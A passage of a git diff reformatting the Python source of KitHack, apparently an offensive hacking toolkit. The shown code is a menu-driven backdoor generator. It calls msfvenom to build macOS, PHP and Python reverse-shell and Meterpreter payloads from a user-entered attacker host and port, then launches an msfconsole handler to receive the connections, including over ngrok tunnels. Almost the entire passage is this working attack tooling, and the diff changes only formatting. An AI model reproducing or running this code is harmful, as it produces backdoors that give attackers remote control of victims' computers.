os.stat("output/{}.macho".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6668,55 +5513,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p osx/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p osx/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.macho".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6726,55 +5561,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p osx/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p osx/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.macho".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6788,8 +5613,10 @@ def main(): elif sys == "05": print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) - print("{0}[01]{1} php/meterpreter_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[02]{1} php/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[01]{1} php/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[02]{1} php/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) print("{0}[03]{1} php/reverse_php".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -6799,55 +5626,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p php/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p php/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.php".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6857,55 +5674,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.php".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6915,55 +5722,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p php/reverse_php LHOST={0} LPORT={1} R > output/{2}.php".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p php/reverse_php LHOST={0} LPORT={1} R > output/{2}.php" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.php".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/reverse_php; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6978,12 +5775,17 @@ def main(): elif sys == "06": print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) - print("{0}[01]{1} python/meterpreter_reverse_http".format(WHITE, YELLOW)) - print("{0}[02]{1} python/meterpreter_reverse_https".format(WHITE, YELLOW)) - print("{0}[03]{1} python/meterpreter_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[04]{1} python/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[01]{1} python/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} python/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} python/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} python/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) print("{0}[05]{1} python/shell_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[06]{1} python/shell_reverse_tcp_ssl".format(WHITE, YELLOW)) + print("{0}[06]{1} python/shell_reverse_tcp_ssl".format( + WHITE, YELLOW)) print("{0}[07]{1} python/shell_reverse_udp".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -6993,55 +5795,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_http LHOST={0} LPORT={1} -f raw > output/{2}.py".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_http LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.py".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_http; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7051,55 +5843,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_https LHOST={0} LPORT={1} -f raw > output/{2}.py".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_https LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.py".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_https; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7109,55 +5891,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.py".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7167,55 +5939,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.py".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - 